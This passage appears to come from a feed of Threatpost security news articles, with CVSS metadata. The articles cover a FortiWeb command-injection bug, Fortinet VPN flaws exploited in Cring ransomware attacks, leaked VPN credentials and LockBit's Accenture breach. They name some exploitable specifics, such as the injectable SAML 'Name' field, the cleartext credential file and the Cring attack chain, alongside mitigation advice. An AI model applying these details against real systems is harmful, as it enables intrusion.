It can allow a remote, authenticated attacker to execute arbitrary commands on the system, via the SAML server configuration page, according to Rapid7 researcher William Vu, who discovered the bug.\n\n\u201cNote that while authentication is a prerequisite for this exploit, this vulnerability could be combined with another authentication-bypass issue, such as [CVE-2020-29015](<https://www.fortiguard.com/psirt/FG-IR-20-124>),\u201d according to a [Tuesday writeup](<https://www.rapid7.com/blog/post/2021/08/17/fortinet-fortiweb-os-command-injection/>) on the issue.\n\nOnce attackers are authenticated to the management interface of the FortiWeb device, they can smuggle commands using backticks in the \u201cName\u201d field of the SAML Server configuration page. These commands are then executed as the root user of the underlying operating system.\n\n\u201cAn attacker can leverage this vulnerability to take complete control of the affected device, with the highest possible privileges,\u201d according to the writeup. \u201cThey might install a persistent shell, crypto mining software, or other malicious software.\u201d\n\nThe damage could be worse if the management interface is exposed to the internet: Rapid7 noted that attackers could pivot to the wider network in that case. 
However, Rapid7 researchers identified fewer than three hundred appliances that appeared to be doing so.\n\nIn the analysis, Vu provided proof-of-concept exploit code, which uses an HTTP POST request and response.\n\nIn light of the disclosure, Fortinet has sped up plans to release a fix for the problem with FortiWeb 6.4.1 \u2014 originally planned for the end of August, it will now be available by the end of the week.\n\n\u201cWe are working to deliver immediate notification of a workaround to customers and a patch released by the end of the week,\u201d it said in a statement provided to Threatpost.\n\nThe firm also noted that Rapid7\u2019s disclosure was a bit of a surprise given [vulnerability-disclosure norms](<https://threatpost.com/giggle-managing-expectations-vulnerability-disclosure/159039/>) in the industry.\n\n\u201cThe security of our customers is always our first priority. Fortinet recognizes the important role of independent security researchers who work closely with vendors to protect the cybersecurity ecosystem in alignment with their responsible disclosure policies. In addition to directly communicating with researchers, our disclosure policy is clearly outlined on the [Fortinet PSIRT Policy page](<https://www.fortiguard.com/psirt_policy>), which includes asking incident submitters to maintain strict confidentiality until complete resolutions are available for customers. As such, we had expected that Rapid7 hold any findings prior to the end of our [90-day Responsible disclosure window](<https://www.fortiguard.com/zeroday/responsible-disclosure>). We regret that in this instance, individual research was fully disclosed without adequate notification prior to the 90-day window.\u201d\n\nFor now, Rapid7 offered straightforward advice:\n\n\u201cIn the absence of a patch, users are advised to disable the FortiWeb device\u2019s management interface from untrusted networks, which would include the internet,\u201d according to Rapid7. 
\u201cGenerally speaking, management interfaces for devices like FortiWeb should not be exposed directly to the internet anyway \u2014 instead, they should be reachable only via trusted, internal networks, or over a secure VPN connection.\u201d\n\nThe Rapid7 researchers said that the vulnerability appears to be related to [CVE-2021-22123](<https://www.fortiguard.com/psirt/FG-IR-20-120>), which was patched in June.\n\n## **Fortinet: Popular for Exploit**\n\nThe vendor [is no stranger](<https://threatpost.com/fortigate-vpn-default-config-mitm-attacks/159586/>) to cybersecurity bugs in its platforms, and Fortinet\u2019s cybersecurity products are popular as exploitation avenues with cyberattackers, including nation-state actors. Users should prepare to patch quickly.\n\nIn April, the FBI and the Cybersecurity and Infrastructure Security Agency (CISA) [warned that](<https://threatpost.com/fbi-apts-actively-exploiting-fortinet-vpn-security-holes/165213/>) various advanced persistent threats (APTs) were actively exploiting three security vulnerabilities in the Fortinet SSL VPN for espionage. Exploits for CVE-2018-13379, CVE-2019-5591 and CVE-2020-12812 were being used to gain a foothold within networks before moving laterally and carrying out recon, they warned.\n\nOne of those bugs, a Fortinet vulnerability in FortiOS, [was also seen](<https://threatpost.com/hackers-exploit-flaw-cring-ransomware/165300/>) being used to deliver a new ransomware strain, dubbed Cring, that is targeting industrial enterprises across Europe.\n\n_**This post was updated August 18 at 1:30 p.m. 
ET with a statement from Fortinet.**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-18T12:07:33", "type": "threatpost", "title": "Unpatched Fortinet Bug Allows Firewall Takeovers", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-5591", "CVE-2020-12812", "CVE-2020-29015", "CVE-2021-22123"], "modified": "2021-08-18T12:07:33", "id": "THREATPOST:BE0B5E93BD5FBBCB893FDDFE5348FDE9", "href": "https://threatpost.com/unpatched-fortinet-bug-firewall-takeovers/168764/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-04-08T21:27:05", "description": "Threat actors are exploiting a Fortinet vulnerability flagged by the feds last week that delivers a new ransomware strain, dubbed Cring, that is targeting industrial enterprises across Europe.\n\nResearchers say the attackers are exploiting an unpatched path-traversal flaw, tracked as [CVE-2018-13379](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13379>), in Fortinet\u2019s FortiOS. 
The goal is to gain access to victims\u2019 enterprise networks and ultimately deliver ransomware, according to a [report by Kaspersky researchers published](<https://ics-cert.kaspersky.com/reports/2021/04/07/vulnerability-in-fortigate-vpn-servers-is-exploited-in-cring-ransomware-attacks/>) this week.\n\n\u201cIn at least one case, an attack of the ransomware resulted in a temporary shutdown of the industrial process due to servers used to control the industrial process becoming encrypted,\u201d Kaspersky senior security researcher Vyacheslav Kopeytsev wrote in the report.\n\nCring is relatively new to the ransomware threat landscape\u2014which already includes dominant strains [REvil](<https://threatpost.com/revil-claims-ransomware-attacks/164739/>), [Ryuk](<https://threatpost.com/ransomware-attack-spain-employment-agency/164703/>), [Maze](<https://threatpost.com/maze-ransomware-cognizant/154957/>) and [Conti](<https://threatpost.com/conti-40m-ransom-florida-school/165258/>). Cring was first [observed and reported](<https://id-ransomware.blogspot.com/2021/01/cring-ransomware.html>) by the researcher who goes by Amigo_A and Swisscom\u2019s CSIRT team in January. The ransomware is unique in that it uses two forms of encryption and destroys backup files in an effort to antagonize victims and prevent them from retrieving backup files without paying the ransom.\n\nLast week, the FBI and the Cybersecurity and Infrastructure Security Agency (CISA) [warned](<https://threatpost.com/fbi-apts-actively-exploiting-fortinet-vpn-security-holes/165213/>) that nation-state advanced persistent threat (APT) groups were actively exploiting known security vulnerabilities in the Fortinet FortiOS operating system, affecting the company\u2019s SSL VPN products.\n\nOne of those bugs is CVE-2018-13379, a path-traversal flaw in Fortinet FortiOS. 
The vulnerability is tied to the system\u2019s SSL VPN web portal and allows an unauthenticated attacker to download system files from targeted systems via specially crafted HTTP resource requests.\n\nIn its report, Kaspersky echoed the feds\u2019 warning, adding that attackers first scan connections to Fortinet VPNs to see whether the software running on the device is a vulnerable version. In the campaign researchers observed, threat actors follow an exploit chain, exploiting CVE-2018-13379 to launch a directory-traversal attack. The goal is to crack open affected hardware, give adversaries access to network credentials and establish a foothold in the targeted network, Kopeytsev explained.\n\n\u201cA directory-traversal attack allows an attacker to access system files on the Fortigate SSL VPN appliance,\u201d he wrote. \u201cSpecifically, an unauthenticated attacker can connect to the appliance through the internet and remotely access the file \u2018sslvpn_websession,\u2019 which contains the username and password stored in cleartext.\u201d\n\nFor its part, \u201cthe security of our customers is our first priority,\u201d according to a statement from Fortinet provided to Threatpost. \u201cFor example, CVE-2018-13379 is an old vulnerability resolved in May 2019. Fortinet immediately issued a _[PSIRT advisory](<https://fortiguard.com/psirt/FG-IR-18-384>)_ and communicated directly with customers and via corporate blog posts on multiple occasions in _[August 2019](<https://www.fortinet.com/blog/business-and-technology/fortios-ssl-vulnerability>)_ and _[July 2020](<https://www.fortinet.com/blog/business-and-technology/atp-29-targets-ssl-vpn-flaws>)_ strongly recommending an upgrade. 
Upon resolution we have consistently communicated with customers as recently as late 2020. If customers have not done so, we urge them to immediately implement the upgrade and mitigations.\u201d\n\n## **Anatomy of an Attack**\n\nOnce they gain access to the first system on the enterprise network, attackers use the Mimikatz utility to steal the account credentials of Windows users who had previously logged in to the compromised system, according to Kaspersky.\n\nIn this way, attackers compromised the domain administrator account, and then used [commodity tools](<https://threatpost.com/ryuk-ransomware-gang-zerologon-lightning-attack/160286/>) like the Cobalt Strike backdoor and PowerShell to propagate attacks across various systems on the network, according to the report.\n\nAfter gaining complete control, attackers download a cmd script to launch Cring ransomware, naming the malicious execution script \u201cKaspersky\u201d to disguise it as a security solution, Kopeytsev said.\n\nThe report breaks down how Cring achieves encryption and destroys existing backup files once it\u2019s launched on a system. First, the ransomware stops various services of two key programs on the network\u2014Veritas NetBackup and Microsoft SQL Server.\n\nCring also halts the SstpSvc service, which is used to create VPN connections; researchers surmised this was done to block any remediation effort by system administrators, Kopeytsev said.\n\n\u201cIt is most likely that the attackers, who at this stage controlled the infected system via Cobalt Strike, did this to make it impossible to connect to the infected system remotely via VPN,\u201d he wrote. 
\u201cThis was done to prevent system administrators from providing a timely response to the information security incident.\u201d\n\nCring proceeds by terminating other application processes in Microsoft Office and Oracle Database software to facilitate encryption, as well as removing key backup files to prevent recovery, according to the report.\n\nIn its final step, Cring starts to encrypt files using strong encryption algorithms so victims can\u2019t decrypt files without knowing the RSA private key held by the attackers, Kopeytsev explained. First each file is encrypted using an AES encryption key, and then that key is in turn encrypted using an 8,192-bit RSA public key hard-coded into the malicious program\u2019s executable file, he wrote.\n\nOnce encryption is complete, the malware drops a ransom note from attackers asking for two bitcoins (currently the equivalent of about $114,000) in exchange for the encryption key.\n\n## **Learning from Mistakes**\n\nThe report points out key mistakes made by network administrators in the attack observed by Kaspersky researchers in the hopes that other organizations can learn from them. 
First, the attack highlights once again the importance of keeping systems updated with the latest patches, which could have avoided the incident altogether, Kopeytsev said.\n\n\u201cThe primary causes of the incident include the use of an outdated and vulnerable firmware version on the Fortigate VPN server (version 6.0.2 was used at the time of the attack), which enabled the attackers to exploit the CVE-2018-13379 vulnerability and gain access to the enterprise network,\u201d he wrote.\n\nSystem administrators also left themselves open to attack by not only running an antivirus (AV) system that was outdated, but also by disabling some components of AV that further reduced the level of protection, according to the report.\n\nKey errors in configuring privileges for domain policies and the parameters of RDP access also came into play in the attack, basically giving attackers free rein once they entered the network, Kopeytsev observed.\n\n\u201cThere were no restrictions on access to different systems,\u201d he wrote. \u201cIn other words, all users were allowed to access all systems. Such settings help attackers to distribute malware on the enterprise network much more quickly, since successfully compromising just one user account provides them with access to numerous systems.\u201d\n
", "cvss3": {}, "published": "2021-04-08T14:00:32", "type": "threatpost", "title": "Hackers Exploit Fortinet Flaw in Sophisticated Cring Ransomware Attacks", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-13379"], "modified": "2021-04-08T14:00:32", "id": "THREATPOST:35A43D6CB9FAF8966F5C0D20045D1166", "href": "https://threatpost.com/hackers-exploit-flaw-cring-ransomware/165300/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-09-10T13:33:05", "description": "Credentials pilfered from 87,000 unpatched Fortinet SSL-VPNs have been posted online, the company has [confirmed](<https://www.fortinet.com/blog/psirt-blogs/malicious-actor-discloses-fortigate-ssl-vpn-credentials>).\n\nOr then again, maybe the number is far greater. On Wednesday, [BleepingComputer](<https://www.bleepingcomputer.com/news/security/hackers-leak-passwords-for-500-000-fortinet-vpn-accounts/>) reported that it\u2019s been in touch with a threat actor who leaked a list of nearly half a million Fortinet VPN credentials, allegedly scraped from exploitable devices last summer.\n\nThe news outlet has analyzed the file and reported that it contains VPN credentials for 498,908 users over 12,856 devices. BleepingComputer didn\u2019t test the credentials but said that all of the IP addresses check out as Fortinet VPN servers.\n\nAccording to analysis done by [Advanced Intel](<https://www.advintel.io/post/groove-vs-babuk-groove-ransom-manifesto-ramp-underground-platform-secret-inner-workings>), the IP addresses are for devices worldwide. 
As the chart below shows, there are 22,500 victimized entities located in 74 countries, with 2,959 of them being located in the US.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/09/09180501/distribution-e1631225115765.jpg>)\n\nThe geographical distribution of the Fortinet VPN SSL list. Source: Advanced Intel.\n\nUPDATE: Threatpost reached out to Fortinet for clarification on how many devices were compromised. A spokesperson\u2019s reply reiterated the statement put out on Wednesday:\n\n\u201cThe security of our customers is our first priority. Fortinet is aware that a malicious actor has disclosed on a dark web forum, SSL-VPN credentials to access FortiGate SSL-VPN devices. The credentials were obtained from systems that have not yet implemented the patch update provided in May 2019. Since May 2019, Fortinet has continuously communicated with customers urging the implementation of mitigations, including corporate blog posts in [August 2019](<https://urldefense.proofpoint.com/v2/url?u=https-3A__www.fortinet.com_blog_business-2Dand-2Dtechnology_fortios-2Dssl-2Dvulnerability&d=DwMGaQ&c=tEbGsWWjqkBSpaWdXc_mdMSanI1bDu-FKXiKGCfVmPM&r=ci047yKZbNETIRLbYhPR9hvS9MgdS6HahLetj-MiY5k&m=S-tLJEaNHed7zOH8JaLd3mVoBNXqYMeUqJMrJaXLE9s&s=LGgVh3l8kre7r4f1ssl1_Kz9MXkRjaAznfUi1BMjzpc&e=>), [July 2020](<https://urldefense.proofpoint.com/v2/url?u=https-3A__www.fortinet.com_blog_business-2Dand-2Dtechnology_atp-2D29-2Dtargets-2Dssl-2Dvpn-2Dflaws&d=DwMGaQ&c=tEbGsWWjqkBSpaWdXc_mdMSanI1bDu-FKXiKGCfVmPM&r=ci047yKZbNETIRLbYhPR9hvS9MgdS6HahLetj-MiY5k&m=S-tLJEaNHed7zOH8JaLd3mVoBNXqYMeUqJMrJaXLE9s&s=F9W4tauf4zFHFuZbvTYHmF2Y2b_tHI0htVTpiF6kRwM&e=>), [April 
2021](<https://urldefense.proofpoint.com/v2/url?u=https-3A__www.fortinet.com_blog_psirt-2Dblogs_patch-2Dvulnerability-2Dmanagement&d=DwMGaQ&c=tEbGsWWjqkBSpaWdXc_mdMSanI1bDu-FKXiKGCfVmPM&r=ci047yKZbNETIRLbYhPR9hvS9MgdS6HahLetj-MiY5k&m=S-tLJEaNHed7zOH8JaLd3mVoBNXqYMeUqJMrJaXLE9s&s=m_k7PDQ0L4L0_OvdKQgGF5LkRVde6Q9EjgVXWtyg7sY&e=>) and [June 2021](<https://www.fortinet.com/blog/psirt-blogs/prioritizing-patching-is-essential-for-network-integrity>). For more information, please refer to our latest [blog](<https://www.fortinet.com/blog/psirt-blogs/malicious-actor-discloses-fortigate-ssl-vpn-credentials>) and [PSIRT](<https://www.fortiguard.com/psirt/FG-IR-18-384>) advisory. We strongly urge customers to implement both the patch upgrade and password reset as soon as possible.\u201d\n\n## A Creaky Old Bug Was Exploited\n\nOn Wednesday, the company confirmed that the attackers exploited [FG-IR-18-384](<https://www.fortiguard.com/psirt/FG-IR-18-384>) / [CVE-2018-13379](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13379>): a path traversal weakness in Fortinet\u2019s FortiOS that was discovered in 2018 and which has been [repeatedly](<https://threatpost.com/election-systems-attack-microsoft-zerologon/160021/>), [persistently](<https://threatpost.com/apt-groups-exploiting-flaws-in-unpatched-vpns-officials-warn/148956/>) [exploited](<https://threatpost.com/hackers-exploit-flaw-cring-ransomware/165300/>) [since](<https://threatpost.com/nsa-security-bugs-active-nation-state-cyberattack/165446/>) then.\n\nUsing the leaked VPN credentials, attackers can perform data exfiltration, install malware and launch ransomware attacks.\n\nThe bug, which recently made it to the Cybersecurity and Infrastructure Security Agency\u2019s (CISA\u2019s) list of the [top 30 most-exploited flaws](<https://threatpost.com/cisa-top-bugs-old-enough-to-buy-beer/168247/>), lets an unauthenticated attacker use specially crafted HTTP resource requests in order to download system files under the SSL 
VPN web portal.\n\n[Fortinet fixed the glitch](<https://www.fortiguard.com/psirt/FG-IR-18-384>) in a May 2019 update (and has since then repeatedly urged customers to upgrade their devices to FortiOS 5.4.13, 5.6.14, 6.0.11, or 6.2.8 and above). But even if security teams patched their VPNs, if they didn\u2019t also reset the devices\u2019 passwords at the same time, the VPNs still might be vulnerable.\n\n## All in the Babuk Family\n\nAccording to BleepingComputer, a threat actor known as Orange \u2013 the administrator of the newly launched RAMP hacking forum and a previous operator of the Babuk ransomware operation \u2013 was behind the leak of Fortinet credentials.\n\nOrange, who reportedly split off from Babuk after gang members quarreled, is believed to now be in with the new Groove ransomware operation. On Tuesday, Orange created a post on the RAMP forum with a link to a file that allegedly contained thousands of Fortinet VPN accounts.\n\nAt the same time, a post promoting the Fortinet leak appeared on Groove\u2019s data leak site.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/09/09181910/Screen-Shot-2021-09-09-at-6.18.51-PM-e1631225999483.png>)\n\nGroove is a new ransomware gang that\u2019s been active just since last month. 
It favors the [double extortion](<https://threatpost.com/double-extortion-ransomware-attacks-spike/154818/>) model of combining data compromise with threats to publish seized data.\n\nAccording to a Wednesday [post](<https://www.mcafee.com/blogs/enterprise/mcafee-enterprise-atr/how-groove-gang-is-shaking-up-the-ransomware-as-a-service-market-to-empower-affiliates>) co-authored by researchers from Intel471 and McAfee Enterprise Advanced Threat Research (ATR), with contributions from Coveware, McAfee Enterprise ATR said that it believes with high confidence that Groove is associated with the Babuk gang, either as a former affiliate or subgroup.\n\n## Chatting Up the Ransomware \u2018Artist\u2019\n\nOn Tuesday, one of the Groove gang\u2019s members decided to chat up [Advanced Intel researchers](<https://u7061146.ct.sendgrid.net/ls/click?upn=4tNED-2FM8iDZJQyQ53jATURfcd4v3FHxX6gbihrPKiOsKVZWKogo5F6F12wmaozsXKHpRn-2BuwOKhxsw08i8Jv-2FwvO5fMxaC-2Fte96Z6WZovyPDvgaoAv118tKwZ5rO8iwUDyyIWPDHnMoXBJtaLTD2RabFZrrydZEg6RqJoehkdLk-3DUm1f_q07lK5GAAVvAnbc-2Fr-2FBDhAPhoMvwzp-2Bdh4wgfTcF0AUhu01ZMXdKNJrsN0iCyDU7ehW0N22Ype9yCK1TM6XYzQ9CpkZyf7pccI4YxuRF0BJuYEbml5ScFK0-2F-2FZqd-2FdTfxpBYaCF7SSTgcHUKKV76UPqxTA0p35WcvHO-2B-2FRJuzuH54khmPYQLlkSfPjUHNAEXmgG-2BAfkNgcNKoVR9B9stOpafLCBk3qkXifeCsD9qirBA0nFvpW7EKJZBqmyDuRJPZiat-2B-2BXYCIJyRqjlbli1cMzNiEtsWjfRjsB82fJ-2BuXkMJGLitr0yTHVhHoV-2B7vgARde73QCuABoV-2Fk8lDDaGpEQVoKiwlCAiZTq63zy5kUQ-3D>) to give them an insider\u2019s take on how the new ransomware syndicate was formed and how it recruits operators. 
That included \u201cthe \u2018truth\u2019 about the association of Babuk, [DarkSide](<https://threatpost.com/darksides-servers-shutdown/166187/>) and [BlackMatter](<https://threatpost.com/ransomware-gangs-haron-blackmatter/168212/>), and other insights on the inner relationships within the ransomware community,\u201d as researchers Yelisey Boguslavskiy and Anastasia Sentsova explained.\n\nAccording to their writeup, the Groove representative is likely a threat actor that goes by \u201cSongBird\u201d. The researchers described SongBird as a known character, being a former Babuk ransomware operator and creator of the RAMP forum \u2013 which was launched on July 11 and which caters to top ransomware operators plotting their attacks.\n\nThe screen capture below shows Advanced Intel\u2019s translation of SongBird\u2019s explanation of the platform: \u201cRAMP is the result of my year-long work of manipulation by top journalists and media such as Bloomberg and others. I spent quite some time to promote this domain and I am very proud for all of the work I did! I declare this forum is a work of art!\u201d\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/09/09183430/kitten-brag-e1631226887669.jpg>)\n\nAccording to Advanced Intel, RAMP was initially based on the former Babuk\u2019s data leak website domain but has since relocated to a new domain.\n\nSongBird was reportedly prompted to pull off their tell-all after the [disclosure of Babuk\u2019s source code](<https://threatpost.com/babuk-ransomware-builder-virustotal/167481/>). The source code was uploaded to VirusTotal in July, making it available to all security vendors and competitors. At the time, it wasn\u2019t clear how it happened, though Advanced Intel said on Wednesday that the code release was done by an actor using the alias DY-2.\n\nThe code release had repercussions, Advanced Intel said. 
\u201cThe incident caused a massive backlash from the underground community which once again provoked the release of the blog by SongBird,\u201d according to the report.\n\nSongBird told the researchers that the actor wanted to address \u201cthe issue of constant misinformation and misreporting originating from the Twitter community covering the ransomware subject.\u201d\n\nThe actor denied any associations between DarkSide and BlackMatter, with the exception of both ransomware strains sharing the same source code: a circumstance that means the code \u201cmost likely has been purchased from one of the DarkSide affiliates,\u201d SongBird wrote.\n\n## How to Protect Your VPN\n\nYou can check Fortinet\u2019s advisory for a list of versions affected by the oft-exploited vulnerability that was at the heart of this credential scraping. Fortinet had the following recommendations for organizations that may have been running an affected version \u201cat any time\u201d:\n\n 1. Disable all VPNs (SSL-VPN or IPSEC) until the following remediation steps have been taken.\n 2. Immediately upgrade affected devices to the latest available release, as detailed below.\n 3. Treat all credentials as potentially compromised by performing an organization-wide password reset.\n 4. Implement multi-factor authentication, which will help mitigate the abuse of any compromised credentials, both now and in the future.\n 5. Notify users to explain the reason for the password reset and monitor services such as HIBP for your domain. There is the potential that if passwords have been reused for other accounts, they could be used in credential stuffing attacks.\n\nRajiv Pimplaskar, Veridium chief revenue officer, told Threatpost that the breach is \u201ca stark reminder of today\u2019s dangers with password-based systems. 
While enterprises and users are starting to adopt passwordless authentication methods like \u2018phone as a token\u2019 and FIDO2 for customer and Single Sign On (SSO) portals and enterprise applications, vulnerabilities still exist across entire categories of cases such as 3rd-party sites, VPN (Virtual Private Network) and VDI (Virtual Desktop Infrastructure) environments, all of which are particularly vulnerable in the current WFH explosion.\n\n\u201cCompanies need to adopt a more holistic modern authentication strategy that is identity provider agnostic and can operate across all use cases in order to build true resiliency and ensure cyber defense against such actors,\u201d he concluded.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-09T22:49:27", "type": "threatpost", "title": "Thousands of Fortinet VPN Account Credentials Leaked", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379"], "modified": "2021-09-09T22:49:27", "id": "THREATPOST:8A56F3FFA956FB0BB2BB4CE451C3532C", "href": "https://threatpost.com/thousands-of-fortinet-vpn-account-credentials-leaked/169348/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-08-13T13:06:12", "description": "081321 08:42 UPDATE: Accenture reportedly acknowledged in an internal memo that attackers stole client information and work materials in a July 30 \u201csecurity 
incident.\u201d\n\n[CyberScoop](<https://www.cyberscoop.com/accenture-ransomware-lockbit/>) reports that the memo downplays the impact of the ransomware attack. The outlet quoted Accenture\u2019s internal memo: \u201cWhile the perpetrators were able to acquire certain documents that reference a small number of clients and certain work materials we had prepared for clients, none of the information is of a highly sensitive nature.\u201d Threatpost has asked Accenture to comment on CyberScoop\u2019s report.\n\nEarlier this week, the LockBit ransomware-as-a-service (RaaS) gang published the name and logo of what has now been confirmed as one of its latest victims: Accenture, a global business consulting firm with an insider track on some of the world\u2019s biggest, most powerful companies.\n\nAccenture\u2019s clients include 91 of the Fortune Global 100 and more than three-quarters of the Fortune Global 500. According to its [2020 annual report](<https://www.accenture.com/us-en/about/company/annual-report>), that includes e-commerce giant Alibaba, Cisco and Google. Valued at $44.3 billion, Accenture is one of the world\u2019s largest tech consultancy firms, and employs around 569,000 people across 50 countries.\n\nIn a post on its Dark Web site, LockBit offered up Accenture databases for sale, along with a requisite jab at what the gang deemed to be Accenture\u2019s pathetic security.\n\n> \u201cThese people are beyond privacy and security. I really hope that their services are better than what I saw as an insider. If you are interested in buying some databases, reach us.\u201d \n\u2014LockBit site post.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/08/11162046/LockBit-site-screengrab.png>)\n\nLockBit dark-web site screen capture. 
Source: Cybereason.\n\nAccording to [Security Affairs](<https://securityaffairs.co/wordpress/121048/data-breach/accenture-lockbit-2-0-ransomware-attack.html?utm_source=rss&utm_medium=rss&utm_campaign=accenture-lockbit-2-0-ransomware-attack>), at the end of a ransom payment clock\u2019s countdown, a leak site showed a folder named W1 that contained a collection of PDF documents allegedly stolen from the company. LockBit operators claimed to have gained access to Accenture\u2019s network and were preparing to leak files stolen from Accenture\u2019s servers at 17:30:00 GMT.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/08/11174155/countdown-clock-e1628718131517.png>)\n\nLockBit countdown clock. Source: Cyble.\n\nThe news hit the headlines late Wednesday morning Eastern Time, after CNBC reporter Eamon Javers [tweeted](<https://twitter.com/EamonJavers/status/1425476619934838785>) about the gang\u2019s claim that it would be releasing data within coming hours and that it was offering to sell insider Accenture information to interested parties.\n\n> A hacker group using Lockbit Ransomware says they have hacked the consulting firm Accenture and will release data in several hours, CNBC has learned. They are also offering to sell insider Accenture information to interested parties.\n> \n> \u2014 Eamon Javers (@EamonJavers) [August 11, 2021](<https://twitter.com/EamonJavers/status/1425476619934838785?ref_src=twsrc%5Etfw>)\n\n## Blessed Be the Backups\n\nYes, we were hit, but we\u2019re A-OK now, Accenture confirmed: \u201cThrough our security controls and protocols, we identified irregular activity in one of our environments. We immediately contained the matter and isolated the affected servers,\u201d it said in a statement. 
\u201cWe fully restored our affected systems from backup, and there was no impact on Accenture\u2019s operations, or on our clients\u2019 systems.\u201d\n\nAccording to [BleepingComputer](<https://www.bleepingcomputer.com/news/security/accenture-confirms-hack-after-lockbit-ransomware-data-leak-threats/>), the group that threatened to publish Accenture\u2019s data \u2013 allegedly stolen during a recent cyberattack \u2013 is known as LockBit 2.0.\n\nAs explained by Cybereason\u2019s Tony Bradley in a Wednesday [post](<https://www.cybereason.com/blog/rising-threat-from-lockbit-ransomware>), the LockBit gang is similar to its ransomware-as-a-service (RaaS) brethren DarkSide and REvil: Like those other operations, LockBit uses an affiliate model to rent out its ransomware platform, taking a cut of any ransom payments that result.\n\nBradley noted that the LockBit gang is apparently on a hiring spree in the wake of [DarkSide](<https://threatpost.com/darksides-servers-shutdown/166187/>) and [REvil](<https://threatpost.com/whats-next-revil-victims/167926/>) both shutting down operations.\n\n\u201cThe wallpaper displayed on compromised systems now includes text inviting insiders to help compromise systems \u2013 promising payouts of millions of dollars,\u201d Bradley wrote.\n\n## Insider Job?\n\nCyble researchers suggested in a [Tweet stream](<https://twitter.com/AuCyble/status/1425422006690881541>) that this could be an insider job. \u201cWe know #LockBit #threatactor has been hiring corporate employees to gain access to their targets\u2019 networks,\u201d the firm tweeted, along with a clock counting down how much time was left for Accenture to cough up the ransom.\n\n> Potential insider job? 
We know [#LockBit](<https://twitter.com/hashtag/LockBit?src=hash&ref_src=twsrc%5Etfw>) [#threatactor](<https://twitter.com/hashtag/threatactor?src=hash&ref_src=twsrc%5Etfw>) has been hiring corporate employees to gain access to their targets' networks.[#ransomware](<https://twitter.com/hashtag/ransomware?src=hash&ref_src=twsrc%5Etfw>) [#cyber](<https://twitter.com/hashtag/cyber?src=hash&ref_src=twsrc%5Etfw>) [#cybersecurity](<https://twitter.com/hashtag/cybersecurity?src=hash&ref_src=twsrc%5Etfw>) [#infosec](<https://twitter.com/hashtag/infosec?src=hash&ref_src=twsrc%5Etfw>) [#accenture](<https://twitter.com/hashtag/accenture?src=hash&ref_src=twsrc%5Etfw>) [pic.twitter.com/ZierqRVIjj](<https://t.co/ZierqRVIjj>)\n> \n> \u2014 Cyble (@AuCyble) [August 11, 2021](<https://twitter.com/AuCyble/status/1425391442248097792?ref_src=twsrc%5Etfw>)\n\nCyble said that LockBit claimed to have made off with databases of more than 6TB and that it demanded $50 million as ransom. The threat actors themselves alleged that this was an insider job, \u201cby someone who is still employed there,\u201d though Cyble called that \u201cunlikely.\u201d\n\nSources familiar with the attack told BleepingComputer that Accenture confirmed the ransomware attack to at least one computer telephony integration (CTI) vendor and that it\u2019s in the process of notifying more customers. 
